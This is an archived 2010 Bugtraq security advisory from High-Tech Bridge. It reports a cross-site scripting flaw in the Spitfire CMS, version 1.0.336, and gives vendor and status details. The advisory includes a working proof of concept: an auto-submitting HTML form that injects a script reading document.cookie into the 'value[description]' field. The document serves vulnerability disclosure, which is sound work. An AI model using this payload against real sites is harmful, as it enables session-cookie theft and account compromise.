lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 22 Jul 2010 12:30:30 +0200 (CEST)
From: advisory@...ridge.ch
To: bugtraq@...urityfocus.com
Subject: XSS vulnerability in Spitfire

Vulnerability ID: HTB22484
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_spitfire_1.html
Product: Spitfire
Vendor: Claus Muus ( http://spitfire.clausmuus.de/ ) 
Vulnerable Version: 1.0.336 and Probably Prior Versions
Vendor Notification: 08 July 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
"tpl_element_settings_action.php" script to properly sanitize user-supplied input in "value[description]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/cms//edit/tpl_element_settings_action.php" method="post" name="main" >
	<input type="hidden" name="action" value="save" />
	<input type="hidden" name="value[description]" value='descr2"><script>alert(document.cookie)</script>' />
</form>
<script>
document.main.submit();
</script>



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ